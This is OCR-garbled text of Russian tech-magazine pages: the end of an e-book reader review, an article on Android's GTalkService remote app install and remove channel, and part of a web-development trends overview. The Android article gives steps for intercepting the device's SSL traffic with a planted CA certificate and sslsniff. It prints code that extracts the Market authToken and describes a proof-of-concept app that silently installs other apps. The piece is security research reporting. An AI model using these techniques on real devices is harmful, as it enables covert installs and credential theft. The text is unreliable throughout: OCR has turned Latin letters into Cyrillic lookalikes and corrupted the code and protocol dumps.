друг к другу. На нижнем торце доступны разъемы МісгоЗО, 3,5-мм ми- 
ни-джек под наушники или акустику, видеовыход и порт Міпі 115В. Там 
же расположился микрофон, с помощью которого можно записывать, 
например, заметки. Все сенсорные клавиши раскиданы по лицевой 
части, и лишьодна — аппаратная. И это — выключатель, располо- 
женный в нижней левой части корпуса. Рядом находятся кнопки Ріау/ 
Раизе, масштабирования, возврата и вызова меню. Правее располо- 
жены клавиши навигации, коих, традиционно, четыре штуки. По бокам 
ты найдешь клавиши перелистывания. 

Начинка и форматы, форматы, 
форматы... 

Главная звезда шоу — семидюймовый цветной экран с ЕЕО-подсвет- 
кой и разрешением 800x480 пикселей. Его вполне достаточно для про- 
смотра видео в дорожныхусловиях. Встроенной памяти 4 Гбайт для 
книжных дел более чем хватает, а под видео- и аудиофайлы разумнее 
использовать карту стандарта МісгоЗО. 

ѴѴЕХЕЕР.ВООКТ7002 понимаетмножество форматов книг: ТХТ, РОЕ, 
РВ2, ЕРІІВ и другие. Крометого, можно просматривать цветные 
изображения, например, ОРО с разрешением до 31 62x31 62 пикселей. 
Послужной списоксовместимости с видеофайлами также хорош: ѴѴМѴ, 
АѴІ, МРЕѲ и МКѴ. Однако стоит иметь ввиду, что книга переваривает 
видеопоток максимум 2 Мбит/с. Также ѴѴЕХЕЕР.ВООКТ7002 способна 
проигрывать аудиофайлы, включая МРЗ, ѴѴМА, ПАС и ААС. Записьже 



с микрофона производится в формате ѴѴАѴ (32/45 Кбит/с). Из дополни- 
тельных опций: нельзя пройти мимо встроенного динамика и функции 
радио. 

Практика использования 

Книга довольно быстро включается, навигация оперативна. Главное меню 
встречаетинформативными иконками с подписями, запутаться невоз- 
можно. Раздел «Книги» являет собой библиотеку: просмотр книг по автору, 
названию, обложке и так далее. 

В главном меню по соседству есть пункт«История», он ускорит доступ к 
тем произведениям, которыеты читаешьсейчас. В режиме чтения есть 
возможность менять размер шрифта, его цвет, а заодно цвет фона. Между 
горизонтальным и вертикальным режимами переключаемся с помощью 
клавиш Ріау/Раизе. Раздел «Музыка» включаетфильтрацию записей 
по артисту, альбому и даже жанру, доступны разнообразные настройки 
воспроизведения и спецэффекты. По поводу видео мы уже упоминали об 
ограничениях — если их соблюдать, проблем не будет. Джентльменский 
набор включает календарь, калькулятор, а также пяток игр, среди которых 
естьтетрис и 5окоЬап. 

Ксенсорным кнопкам придется привыкать, особенно кбоковым. Онитак 
и просятся под палец. Порадовал встроенный динамик, звучит неплохо 
и оченьдаже громкий. И напоследок: при нажатии клавиш включается 
вибрация —удобно! Крометого, благодаря наличию АѴ-выхода, элект- 
ронную книжку можно подключить кобычномутелевизору и смотреть свои 
любимые фильмы на большом экране. Кабель для подключения входит в 
комплект поставки. Книга или медиаплеер? 

Если тебе нужен универсальный медиаплеер и возможность читать книги, 
то ѴѴЕХЕЕР.ВООКТ7002 — подходящий вариант. Заряда аккумулятора хва- 
тит на семь часов чтения или пять часов прокрутки видео, слушать музыку 
можно хотьтридцать часов, но с отключенным экраном. Традиционным 
бонусом станут книги из вселенной «Метро 2033». □с 
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Наш РС никогда не висит! 




МАХІМ 

МУЖСКОЙ ЖУРНАЛ С ИМЕНЕМ 



А 



Альфа-Банк 



(дате)іаіиі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 





V 



АШОЮ-МАРИОНЕТКИ 

Система управления 

всеми устройствами на Апсігоісі: что это? 

о В любой новости про зловредные приложения для платформы Ап- 
сігоісі непременно упоминается механизм, с помощью которого боодіе 
удаленно удаляет нежелательное ПО со всех устройств разом. Как 
работает эта система, и не может ли она сама стать самым большим 
каналом распространения малвари? 



Начну со статистики. Первый девайс на базе Апсігоісі — НТО Огеаіт/ 
01 — был запущен в США и Великобритании в октябре 2008 года. 
Начало стремительного распространения платформы связывают 
с появлением смартфона Моіогоіа ОгоісІ в ноябре 2009 года. Стех 
пор количество девайсов, которые ежедневно активируются, растет 
феноменальным образом. На последней конференции Ѳоодіе І/О 
была заявлена баснословная цифра: 400 000 активаций каждый 
день! Только подумай: это половина населения Кипра или, к приме- 
ру, целый Бруней. Всего на данный момент активировано более 1 00 
миллионов устройств на Апсігоісі. Неплохо. А теперь представь, что 
каждым из них Ооодіе можетхоть немного, но управлять. Возможно, 
я слегка утрирую и слово «управлять»тут не самое подходящее. 
Достоверно известно, что Ооодіе можетустанавливать и удалять 
произвольные приложения через механизм ОТаІкЗегѵісе. Связы- 
вая это с впечатляющей статистикой активаций новых устройств, 



волей-неволей задумываешься о потенциально самом большом 
ботнете в мире, в который пользователи сотнями тысяч входят до- 
бровольно. И хотя идея попахивает научной фантастикой, мне было 
интересно разобраться во внутренностях механизма ОТаІкБегѵісе. 
Какой устроен? В каком виде на устройства приходят сообщения 
от сервера? Насколько защищен канал передачи? Нет л и опасно- 
сти, что сообщение с управляющим и командами на мое устройство 
может отправить кто-то еще? 

Все дело в ОТаІкБегѵісе 

Любой девайс на Апсігоісі поддерживает постоянное ТСР/55І_/ 
ХМРР-соединение с серверами ОТаІк. Все время, когда у него 
есть доступ в Сеть. Соединением управляет специальный сервис 
ОТаІкБегіѵе. Он постоянно отправляет пинги (так называемые 
«ЬеагіЬеаІ-сообщения») на сервера боодіе, чтобы проверить 
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Приложения удалены по команде боодіе 

активность соединения, а в случае обрыва связи автоматически 
переподключается. Этот канал связи позволяет Ѳоодіе осу- 
ществлять удаленное управление устройствами. Отправленное 
через ѲТаІкБегѵісе сообщение непременно попадает на каждый 
смартфон. С помощью этого механизма в части работает сервис 
С2йМ (Сіоиб Іо Оеѵісе Меззадіпд Егатеѵѵогк), с помощью которого 
разработчики могут отправлять приложениям, установленным на 
смартфонах пользователей, специальные команды (к примеру, на 
загрузку обновлений). Правда, пока С2БМ ограниченно доступен 
лишь для некоторых разработчиков, которые оставили специаль- 
ную заявку. Известно, что ОС АпбгоісІ поддерживает как минимум 
две команды: РЕМ0ѴЕ_А55ЕТ и ІЫ5ТАЕБ_А55ЕТ, позволяющие 
боодіе удалять и устанавливать произвольные приложения. 

Таким образом, обнаружив в Апбгоіб Магкеі’е малварь, инжене- 
ры компании могут отправить сообщение РЕМ0ѴЕ_А55ЕТ через 
ѲТаІкБегѵісе, и зловредная программа будет разом удалена со всех 
подключенных к инету устройств. Этим, какмызнаемиз новостей, 
компания не раз пользовалась. И обратная ситуация. Кактолько 
Ѳоодіе отдает команду ІМ5ТАББ_А55ЕТ, каждый получивший сооб- 
щение смартфон на Апбгоіб скачивает АРК-дистрибутив с програм- 
мой и инсталлирует ее. Такая возможность с одной стороны хороша: 
Ѳоодіе можетоперативноудалить всю появляющуюся малварь. Но с 
другой стороны, пугает. А что если кто-то сможет реализовать МІТМ- 
атаку на 55І_-соединение конкретного телефона до ѲТаІкБегѵісе и 
проспуфить сообщение ІЫ5ТАЕБ_А55ЕТ, чтобы залить на телефон 
какую-нибудь заразу? Безопасна ли система? 

Надежность канала данных 

Не будем рассматривать варианте захватом инфраструктуры 
Ѳоодіе, через которую теоретически можно было бы загрузить про- 
извольное приложение сразу на все Апбгоіб -девайсы. На данном 
этапе будем считать это фантастикой. А вот что кажется более 
реальным, так это отправка фейковых команд на конкретный де- 
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Интерфейс ОТаІк Бегѵісе Мопйог 



вайе. Да, подключение ѲТаІкБегѵісе, какя заметил выше, является 
защищенным: все данные передаются через 55 Б. Таким образом, 
базовая безопасность и целостность сообщений гарантируется 
уже самим протоколом. Но мы-то знаем цену этим гарантиям (читай 
материал «Вскрываем 55 Б» в 1 25 номере ][). При желании 55Б- 
соединение можно скомпрометировать, перехватить и отревер- 
сить пакеты, передаваемые между девайсом и серверами Ѳоодіе. 
Если разобраться в их структуре и правильно подделать сообще- 
ние ІЫ5ТАББ_А55ЕТ, то мы можем принудительно установить на 
устройство произвольное приложение. Теоретически. Вопрос в том, 
есть ли еще какой-нибудь уровень защиты, например, цифровая 
подпись? Чтобы исследовать поступающие от Ѳоодіе’а сообще- 
ния, их надо получить. Ты сейчас можешь подумать, что придется 
включить снифер и ждать, пока инженеры компании в новь отправят 
через ѲТаІкБегѵісе команду ІЫ5ТАББ_А55ЕТ. Но когда это будет? На 
самом деле все проще. Забегая чуть вперед, скажу, что эта же самая 
служба используется всякий раз, когда пользовательустанавливает 
сообщения через Апб го іб МагкеБ Нажатие кнопки «Іпзіаіі» приво- 
дит ктому, что через ОТаІкБегѵісе отправляется ІМ5ТАББ_А55ЕТ, 
которая инициирует на устройстве процесс загрузки нужного 
АРК-пакета программы и ее установки. Мы об этом еще поговорим, 



Процесс установки приложения в картинках 
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РОЗТ-запрос в АпсІгоісІ ЛЛагкеі в чистом виде 



сейчасже важно одно: получить для исследования сообщение 
ІІ\І5ТАЕЕ_А55ЕТ — не проблема. В общем-то, для просмотра трафи- 
ка (несмотря на то, что он передается через 551-соединение] нужно 
совсем немногое: 

1. Достатьобраз АпсІгоісІ -эмулятора, в котором включена возмож- 
ность работы с АпсІгоісІ МагкеБом. 

2. Добавить свой СА-сертификат в хранилище /зузіепп/еіс/зесигііу/ 
сасегіз.бк, используя кеуіооіили рогіесіе. 

3. Реализовать МІТМ-атаку, заюзав эзізп іб ( ѵѵѵѵѵѵТбоидбІсгіппе.ог ) с 
СА-сертификатом. 

Теперь, когда СТаІкЭегѵісе захочетустановить соединение, мы 
сможем перехватитьтрафик, поскольку устройство доверяет СА- 
сертификату, который мы создали. Если попробовать установить 
какое-нибудь приложение из АпсІгоісІ МагкеБа на эмуляторе, то мы, 
соответственно, отснифаем сообщение ІІ\І5ТАЕЕ_А55ЕТ. Оно будет 
выглядеть примерно так: 



Біск1е_іб: 1277687266074 
аззеісісі : -155863831473120556 
а55еБ_пате: Керііса Ізіапб 

а55еБ_Буре: САМЕ 

аз5еБ_раска§е : сот. герііса . герііса ізіапб 
а5 5еБ_ЫоЬ_иг1 Еііііір : //апсіпоісі . сІіепБз . 

§оо§1е. сот/та гкеБ/бомп1оаб/0оіл/п1оаб?а55е1:Іб= 

-15 586383 147 31 205 56&и 5 егісі =9860321 18775& 
сіеѵі с еІсІ = 1094117203906638597 
а55еБ_5І§паБиге : Ауп2ЫлЮрскркК5ВУ43ипѵСРрУМ0 
а55еБ_5І2е: 5144485 

Большинство параметров описывают приложение, которое 
пользователь запросил из Апбгоіб МагкеБа. Интерес пред- 
ставляет атрибут а5зеІ_5ІдпаІиге. Можно предположить, что 
это криптографическая подпись сообщения ІІ\І5ТАЕЕ_А55ЕТ, с 
помощью которого дополнительно гарантируется его целост- 
ность. Увы, это не так. Энтузиастами давно установлено, что это 
не что иное, как кодированный в базе 64 хэш АР К- файл а (т.е. 
дистрибутива программы), который пользователь запросил из 
Апбгоіб МагкеБа. Мылишь можем в этот раз убедиться, скачав 
АРК-пакет и выполнив соответствующие преобразования с 
его контрольной суммой. Становится понятно, что никакой 
дополнительной защиты для сообщения ІІ\І5ТАББ_А55ЕТ (и, 
стало быть, любых других) нет. Если атакующий сможет пере- 
хватить 55Б-соединение между СТаІкЭегѵісе, то теоретически 
сможет передать на телефон произвольные сообщения, в том 
числе, для установки приложений! Конечно, есть много «но», 
и представить в деле такую атаку довольно сложно. Для этого, 
по меньшей мере, нужно находиться сжертвой в одной сети, 
чтобы иметь возможность реализовать МІТМ-атаку. Не может 
идти и речи о каком-то массовом заражении пользователей. 

Это не умаляет недостаток защищенности канала связи, но пер- 
спективы к эксплуатации недоработок тут, откровенно говоря, 
слабые. Поэтому не будем на этом больше останавливаться, а 
посмотрим, какие еще сюрпризы таит в себе платформа Апбгоіб 
и механизм ОТаІкЭегѵісе. 





Структура запроса после декодирования из ргоІоЬігі 



Взаимодействие с АпсІгоісІ Магкеі 

Выше я сказал, что ОТаІкЭегѵісе вовлечен в процесс установки при- 
ложений из Апбгоіб МагкеБа. Это вообще интересная история. Тут 
тоже есть интересные нюансы. Рассмотрим для начала этапы, кото- 
рые проходит пользователь для установки программы из маркета: 

1. Запуск Апбгоіб МагкеБ 

2. Поиск нужной приложения для установки. 

3. Нажатие на кнопку «Іпзіаіі». 

4. Подтверждение необходимых для приложения привилегий. 

5. Закачка и установка приложения. 

После этого у пользователя в панели оповещений выводятся со- 
общения о загрузке и установке приложения. Все просто и про- 
зрачно, но... Если посмотреть на процесс изнутри, то все происходит 
несколько сложнее. Если первые четыре шага выполняются прило- 
жением Апбгоіб МагкеБ то за пятый (самый важный) этап отвечает 
совершенно другой компонентсистемы, а именно уже знакомый 
ОТаІкЭегѵісе. Схема работы (см. иллюстрацию для большего пони- 
мания) выглядит следующим образом: 

1. Пользователь кликает на кнопку установки приложения в Апбгоіб 
МагкеБе. 

2. Приложение отправляет Р05Т-запрос на серверы Апбгоіб МагкеБ 

3. Серверы Апбгоіб Матке! отправляют информацию о запросе на 
установку приложения системе С20М. 

4. Серверы С 2БМ отправляют смартфону пользователя сообщение 
ІІ\І8ТАЕЕ_А55ЕТ через подключение СТаІкЭегѵісе. 

5. Компонент СТаІкЭегѵісе принимает сообщение ІІ\І5ТАЕЕ_А55ЕТ и 
активирует Ѵепбіпд- компонент. 

6. Ѵепбіпд-компонентскачивает АРК-пакет приложения и, в конце 
концов, устанавливает приложение. 

Первое, что вызывает интерес — это, конечно же, РОЭТ-запрос, 
который передается на сервер. Раз его может отправить Апбгоіб 
МагкеБ то, возможно, это сможем сделать и мы с помощью специ- 
ального приложения? Попробуем разобраться. 

Перехваченный запрос выглядит следующим образом: 



Р05Т /тагкеБ/арі/АріКедиезБ НТТР/1.1 
СопБепБ-І_еп§БІі : 524 

СопБепБ-Туре : аррІісаБіоп/х-ыыы-Тогт-игІепсобеб 
НобБ: апбгоіб . сІіепБз .§оо§1е. сот 
СоппесБіоп: Кеер-АІіѵе 

ІІ5ег-А§епБ: Апбгоіб-МагкеБ/2 (бгеат 0КС83); § 2 Ір 
ѵег5Іоп=28Щедие5Б=СиАССѵѴВКРРВ(21ІРІ_ОЕРВ(21І1ѵ21лІѴЕѴ0іо4е0іѴ4ОѴК 
1аІлІ9 . . . 

Все банально, кроме параметра гециезБ в котором очевидно и 
прячется все интересное. Зная Соодіе, легко можно предположить, 
что это данные, упакованные в фирменную структуру ргоіоби! ( соі 
доодІе.сот/р/ргоІоЬиЯ и кодированные после этого в Ьазе64. Так 
и есть. Декодировав хэш и распаковав структуру, получаем данные 
запроса: 
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1 { 

1: " 0(2АААК8АААВоееРТ ] 8хех9ТІ іо ..." 

2: 0 

[ . . . вырезано . . . ] 

13: " -6Ѳ6сIЬ30Ѳ0сI480сI63 ,, 

} 

2 { 

10 { 

1: "353999319718585473" 

} 

} 

Уже что-то, но есть проблема: мы не знаем, за что отвечаеттот 
или иной параметр. Скорее всего, это некоторые идентификаторы 
девайса, информация о платформе, некоторые данные для автори- 
зации и, конечно же, идентификатор запрашиваемого из МагкеСа 
приложения. Тут надо сказать, что для многих структур ргоІоЬиб 
которые участвуют в работе с АпбгоісІ МагкеС доступно описание, 
составленное энтузиастами в результате реверсинга. А на сайте 
сосіе.доодіе.сопп/р/апсігоісі-ппагкеі-арі даже выложен коллективно 
написанный АРІ, позволяющий запрашивать различные данные 
из мар кета (описание, иконки программ и т.д.). Правда, данных о 
структуре запроса на установку приложений там нет. Зато реверсинг 
выполнил известный исследователь АпбгоісІ- платформы Джон 
Оберхейд, который впоследствии реализовал интересную атаку, о 
которой я и хочутебе рассказать. Итак, структура запроса в сокра- 
щенном виде выглядиттак: 

[ . . вырезано . . ] 

те55а§е ІпзЕаІІКедиезІ: { 
орЕіопаІ 5І:гіп§ аррісі = 1 ; 

} 

тезза^е КеяиезЕСопЕехІ: { 

гериігесі 5І:гіп§ аиЕбТокеп = 1; 

[ . . вырезано . . ] 

гериігесі 5І:гіп§ апсіпоісіісі = 4 ; 
орЕіопаІ 5І:гіп§ сІеѵісеАпсІБсІкѴегБІоп = 5; 

[ . . вырезано . . ] 

Большинство полей из запроса могут быть извлечены из самого 
девайса (например, язык интерфейса, версия системы и т.д.). Но 
только не параметры арріб и аиіЬТокеп: 

• аррісі — является уникальным идентификатором приложения 
в АпбгоісІ МагкеСе. Этот идентификатор нигде не отображается, 
поэтому единственный способ его получить — запросить приложе- 
ние из АпбгоісІ МагкеСа и отснифать трафик, вытащив из ргоіобиб- 
структуры его идентификатор. 

• аиІЬТокеп — это токен системы СІіепіБодіп, с помощью которого 
серверы АпбгоісІ МагкеСа могут провести аутентификациютвоего 
запроса. 



Если аіЛЬТокеп остается в секрете, то проспуфить запрос не выйдет. 
Ноты можешь заметить, что раз он естьу девайса, значит, в каком- 
то месте системы он все-таки хранится. 

Именно! Такое хранилище называется Ассоипі Мападеги являет- 
ся важным компонентом платформы АпбгоісІ, предоставляющем 
данные для аутентификации. Например, если какое-то приложение 
хочет запостить в ТѵѵіИег сообщение, то ему необязательно знать 
логин и пароль для Тѵѵіиег-аккаунта — оно может за просить токен 
из АсоипіМападег, который позволит ему отправить твит. Так вот 
в этом же самом месте хранится и аиСэТокеп, используемый для 
взаимодействия с серверами АпбгоісІ МагкеТ Но самое смешное из 
всей этой истории, что извлечь его можно буквально несколькими 
строчками кода: 

АссоипЕМапа^ег ассоипЕМапа^ег = 

АссоипЕМапа§ег .§еЕ(§еЕАрр1ісаЕіопСопЕехЕ( ) ) ; 

АссоипЕ ассЕ = §еЕАссоипЕ(ассоипЕМапа§ег) ; 

ассоипЕМапа§ег .§еЕАиЕІпТокеп(ассЕ., "апсІгоісГ , 

Таізе, пем СеЕАиЕІіТокепСа11Ьаск( ) , пиіі); 

Что это значит? Получается, что у нас есть все данные, чтобы соста- 
вить ргоіобиі'-структуру, которую я привел выше, и сконструировать 
Р05Т-запрос для отправки на серверы АпбгоісІ МагкеТ 
Если запрос будет корректным (а он будет, в чем я тебя уверяю), то 
на устройство через ОТаІкЭегѵісе будет, соответственно, отправлено 
сообщение ІІ\І5ТАи__А85ЕТ, что приведет к установке указанного 
нами приложения! А поскольку система устроена так, что разре- 
шение на установку пользователь отдает еще до отправки запроса 
(опять же смотри схему), то его вообще никто и ни о чем не будет 
спрашивать. И приложение установится в систему со всеми необхо- 
димыми разрешениями! 

Атака через приложение 

Теперь, когда мы знаем некоторые тонкости механизма установки 
приложений из АпбгоісІ МагкеСа, можно рассказать об изящной 
атаке, которую удалось провернуть Джону Оберхейду. Идея такова. 
Если мы можем сами конструировать запросы на установку, то ни- 
что не мешает нам написать приложение, которое будет делать это 
автоматически. 

Если подобную функциональность добавить во вполне невинную 
программу и начать распространять через АпбгоісІ Магкеі (что при 
отсутствии контроля несложно), то всем установившим ее пользова- 
телям можно в придачу загрузить все что угодно! Сказано — сдела- 
но. Джон написал РоС- приложение и назвал его Апдгу Вігсіз Вопив 
Беѵеіз, что должно было привлечь внимание пользователей АпбгоісІ 
МагкеЕ Простейшая социальная инженерия сработала: программу 
начали устанавливать пользователи. Наиболее внимательные из 
них наверняка замечали, что в области обновления появлялись 
сообщения об установке еще трех программ: для отслеживания 
месторасположения, осуществления звонков на платные номера и 
кражи контакт-листа. 

Все они действительно имели вредоносную функциональность, но 
никак не использовались. Тут надо сказать, что исследователь сразу 
после тестирования РоС сообщил о проблеме в Ѳоодіе, и компания 
уже пофиксила баг. 

Решение, кстати, оказалось очень простым. Система теперь отме- 
чает для себя все запросы на установку приложений, сделанные 
через АпбгоісІ МагкеТ и проверяет, чтобы для входящего сообще- 
ния ІЫ5ТАи__А55ЕТ был ранее сделан соответствующий запрос. 
Если Ѵепбіпд- компонент получает сообщение ІМЗТАІ_І__А55ЕТ 
для приложения, которое он не ожидает, то команда просто игно- 
рируется. Казалось бы, проблемы больше нет. Но! В теле сообще- 
ния может находиться специальный флаг, который позволяет от- 
рубить проверку (в то мчи еле для сохранения функциональности 
для удаленного удаления приложений), но это уже немного другая 
история, т 
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ВЕБ-РАЗРАБОТКИ 2011 

Инструменты прогрессивных девелоперов 

о Угнаться за всеми появляющимися технологиями для создания 
веб-приложений невозможно. Да и незачем. Но за трендовыми 
решениями, которые проверены на реальных проектах гуру- 
разработчиками, следить нужно. Мы постарались отследить самые 
яркие тренды - и вот что получилось. 



Тренд 1. Отказ от 501. 

Ксовременным веб-проектам предъявляются колоссальныетре- 
бования по части отказоустойчивости. Они должны выдерживать 
большие и очень большие нагрузки. Одним из самых трендовых 
способов увеличить быстродействие системы стал отказ от исполь- 
зования медленных 5СН_ баз данных и переход там, где это воз- 
можно, ктехнологиям по50І_, использующих для хранения данных 
простые структуры данных вроде «ключ-значение». То, что сложно 
было представить еще несколько лет назад, стало сейчас настолько 
очевидным, что многие не перестают удивляться: «Как это мы не 
дошли до этого ранее?». Ведь для большинства веб-приложений 
вовсе не нужны все эти множества типов данных, поддерживаемых 
СУБД, и средств их выборки. Часто необходимо просто сохранить 
информацию и иметь к ней доступ с минимальной задержкой и вы- 



сокой надежностью. 50І_-запросы, как ни крути, даже при оптими- 
зации выполняются относительно медленно. При этом для хранения 
данных зачастую вполне достаточно просто хранить ключ записи и 
ее значение. Значение — это обычные сериал изирова иные данные, 
например, в формате ЗЗОЫ или более продвинутой структуре вроде 
теззадеРак, Ѳоодіе РгоІоВиІ 1 или АрасНеТИгіИ МопдоБВ пошла еще 
дальше, реализовав в качестве замены для удобного ЗБОЫ специ- 
альный двоичный формат. Другая разработка — Ресііз — перевернула 
понятие кеу-ѵаіие-хранилищ, добавив к ним простые, но оказавшие- 
ся эффективными и востребованными списки, хэши и сортирован- 
ные массивы. Интерфейс доступа к по5СН_-базе также максимально 
прост — обычно это простейшие команды типа деі (получить данные 
по ключу), зеі (записать данные с ключом), беіеіе (удаляет ключ и его 
данные), ирбаіе (обновляет уже существующие данные). На низком 
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Облачные интерфейсы 
на заметку 



Если ты хочешь использовать возможности облачных сервисов 
в своих проектах, советую тебе воспользоваться некоторыми 
полезными вспомогательными инструментами. 

АрасЬе Миѵепп ( ) — попытка создать 

кроссплатформенный открытый интерфейс для работы с разны- 
ми сіоиб-платформами, включая Аітагоп ЕС2, МісгозоК Агиге и 
боодіе АррЕпдіпе. В идеале, твоя программа сможет использо- 
вать ресурсы сразу нескольких облаков. 

РеИасІоисі ( ) — решение на РиЬу, 

умеющее работать со всеми известными (и не очень) сіоисі- 
провайдерами. Предоставляет единый РЕЗТ-интерфейс, кото- 
рый скрывает нюансы разных платформ. 

ІіЬсІоисі ( ) — библиотека для программ на 

іаѵа или Руібоп, которая взаимодействует реально чуть ли не со 
всеми в мире известными облачными платформами и унифици- 
рует основные операции по созданию и управлению виртуаль- 
ными машинами. 

Зітріесіоисі ( ) — если ты все еще про- 

граммируешь на РНР, то для тебя есть отличный компонент 
2епб_С1оиб, который добавляет базовую поддержку хранилищ 
данных, очередей сообщений и другие фишки разных сіоисі- 
платформ просто в твое веб-приложение на 2епб Егатеѵѵогк 
или даже на чистом РНР. 
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Доступность клауда через АРІ 
— шаг к приложениям, которые 
сами решают, сколько серверов 
им надо 
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уровнетакие базы строятся на базе хеш-таблиц и их разновид- 
ности — распределенной хеш-таблицы (ОНТ). Благодаря этому 
решения поЗОЕ оказались не только очень быстрыми, но еще и легко 
масштабируемыми. Свойства йНТ такие, что можно присоединять 
новые серверы постоянно, и такая база будет расти и расти. Столько, 
сколько надо. При этом в самих приложениях ничего менять не надо, 
все делается автоматически! Это очень важно, потому что если 
приложение не может одинаково хорошо работать и на одном, и на 
тысяче серверов, то оно не масштабируемо. А значит при неожидан- 
но высокой нагрузке, оно ляжет и уже не сможет восстановить работу, 
даже при покупке новыхсерверов. Вто время какобычные СУБД 
просто рвутся на части и подпираются костылями, чтобы работать 
хоть на паре десятков серверов одновременно, практически любое 
поЗОБ-решение может спокойно масштабироваться хоть на тысячу 
серверов. И все это на скоростях более 1 0Отысяч операций в секунду, 
над гигабайтами данных и миллионами ключей на обычном железе. 
За примером далеко ходить не нужно. ЕасеЬоок использует собствен- 
норучно разработанное поЗОБ-решение Саззапсігаа Тѵѵіиег, которое 
опирается в работе на связку Саззапб га и технологии НВазе. 
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Тренд 2. ^ѵаЗсгірі 
на стороне сервера 

В погоне за производительностью разработчики активно использу- 
ют нетолько новые методы хранения данных, но и прогрессивные 
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РНРРод — самый крутой облачный хостинг для твоего 
РНР-проекта 

технологии для написания кода.Тутявныйтренд — более продвину- 
тое использование ^ѵаЭсгірі Не пойми меня неправильно: конечно 
же, ни один серьезный веб- проект не может обойтись без большого 
количества ЭЭ-кода. Реализация фронтенда (т.е. интерфейса при- 
ложения) практически всегда реализуется именно с помощью этого 
языка, какая бы технология ни применялась для создания бэкэнда. 
Но! Пытливыеумы почесали головы и подумали: а не будетли легче 
использовать ЭЭ более универсально: и на клиенте, и на сервере? Он 
гибкий, что позволяет писать код в разных парадигмах: от обычного 
процедурного до ООП в смеси с функциональным стилем. Простой. 

Но что важнее всего — его асинхронность и неблокируемость. Это 
важный плюс по сравнению со, скажем, обычным РНР-скриптом, 
который непременно блокируется во время выполнения: напри- 
мер, в ожидании выборки из базы данных или ответа от другого 
сервера. Код выполняется последовательно: пока не будет получен 
ответ, сценарий будеттупо простаивать. В случае с ^ѵаЭсгірІты 
просто указываешь, какую функцию необходимо выполнить, когда 
произойдетопределенное событие, и все. В это время другой код 
можетспокойно выполняться. Все строится на событиях и функциях, 
которые эти события обрабатывают (так называемые саІІЬаск’и или 
обработчики событий). Ктакому подходу нужно привыкать, но чтобы 
сделать жизнь проще, были разработаны специальные фреймворки. 
Одним из самых продвинутых стал проект ІЧосІе 05 (подробнее о нем 
ты можешь прочитать в 1 39 номере ][). В основе его лежит Ѵ8, движок 
^ѵаЭсгірІ, который используется в браузере Ѳоодіе СЬготе и благо- 
даря которому он работает невероятно быстро. Это не пустые слова. 

К использованию ІМобе ФЭ меня подтолкнул простой эксперимент. 

На работе я сделал простенький НТТР-сервер (ну честно, 1 0 строчек 
кода) и попробовал его протестировать на нагрузку. В ситуации, когда 
уже падал наш ІМдіпх-сервер, приложение на ІЧосІе ФЭ спокойно про- 
должало принимать подключения и работать как ни в чем не бывало. 

Тренд 3. Использование 
функциональных языков 

Асинхронность — это, конечноже, конек не только ЧаѵаЭсгірІ. Для 
Руібоп хорошие ребята придумали фреймворки Тѵѵізіесі и Тогпасіо, 
для РиЬу есть ЕѵепіМасЫпе, для РНР — рЬрБеатоп с честным 
ІФзІсді, для Чаѵа — ЫеНу. Но помимо примочек для самых обычных 
языков программирования, все большую популярность набирают 
функциональные языки и платформы. Например, Егіапд, который 
специально разработан для создания распределенных систем ком- 
панией Егісззоп. Сейчас найдется немало людей, которые скажут, 
что Егіапд рулит и прочих равных обставляет всех конкурентов, 
эффективно обрабатывая сотни тысяч потоков и умело занимая все 
доступные ядра и серверы. И не просто скажут, а приведут реальные 




СМіиЬ — социальная сеть для твоего кода. А система 
контроля версий и управления проектами — в придачу! 

примеры. Одна проблема: в та ком коде сам черт ногу сломает, а если 
твой программист вдругуйдет, то проекте большой вероятностью на 
некоторое время встанет. Специалистов пока очень мало. Еще одно 
развивающееся направление — Эсаіа. Это мощный, смешанный 
объектно-ориентированный и функциональный язык со статиче- 
ской типизацией и встроенной параллельностью. Шутка ли, Тѵѵіііег, 
наконец, слез с РиЬу-иглы и переписал большую часть критичного 
кода на Эсаіа! Это что-то да означает. Эсаіа часто используется в 
связке с платформой Акка, для которой не чужды понятия «многопо- 
точность», «устойчивость к сбоям», «распределенная архитектура», 
«реалтайм». Фреймворкоснован на распараллеливании вычисле- 
ний в виде акторов (небольшие блоки кода, которые самостоятельно 
планируются для исполнения по разным ядрам, процессам и даже 
узлам кластера). Функциональные языки активно используются в 
тех проектах, где пользователю нужна работа в реальном времени. 

Тренд 4. Реалтайм для веба 

Да-да, для многих веб-приложений стало крайне важным работать 
в режиме реального времени, с минимально возможными задерж- 
ками. Задача, которая непросто решается даже для нескольких 
пользователей, становится огромной проблемой, когда счет юзеров 
идет на сотни тысяч. Сейчасуже есть немало решений, позво- 
ляющих реализовать реалтайм для веба (мы рассказывали про 
технологию Сотеі), но самой прогрессивной и многообещающей 
технологией являются так называемые веб-сокеты. Все уже устали, 
что в браузере утебя есть только НТТР и ничего больше, да и тот 
урезанный и затиснутый в ограничения безопасности. Конечно, 
вражеский Еіазб заботливо подсуетился и предложил альтерна- 
тиву, но кому он теперь нужен? Реализовать реалтайм на основе 
привычного НТТР очень сложно: на каждый чих ему нужно созда- 
вать новое соединение, снова и снова гоняя хотя бы пару килобайт 
данных туда-сюда и ожидая в среднем пол секунды. На деле имеем 
не реалтайм, а скорее костыли. Создатели десктопных приложений 
потирают руки: у них-то есть полный доступ к системе и возможность 
использовать сеть напрямую на низком уровне. Но в НТМІ_5 (уже 
даже не хочется лишний раз его упоминать) появится расширение 
ѴѴеЬЭоскеІз, которое реализуетте же самые сокеты, но в браузере. 
Сокеты для любого веб- приложения — как тебе? Раз соединившись 
с сервером, ты можешь держать открытым канал передачи (в обе 
стороны) сколько угодно долго и пересылать по немулюбые данные. 
Без задержек и лишних тормозов — все ограничивается лишь ка- 
налом связи. Как только у сервера появятся новые данные для тебя, 
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То, чем так хотел быть тетсасЬесІ, но никогда 
не станет. 
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ЫосІеЗЗ — открытие этого года 



ты сразу их получишь. И наоборот. Увы, до полноценной реализа- 
ции этой технологии еще далеко. Многие разработчики кинулись 
создавать различные проекты, вешая на них ярлык реалтайма. Но 
вот в чем проблема: подходящего сервера до сих пор нет! Любимый 
N д і пх, хоть и добравшийся уже до версии 1 .0.3, увы, никак не умеет 
работать с сокетами. Просто все существующие веб-сервера пока 
не умеют корректно работать в ситуации, когда клиенты не про- 
сто пришли, сделали запрос и отвалились до следующего сеанса 
связи (пусть даже раз в секунду, по меркам сервера это очень много 
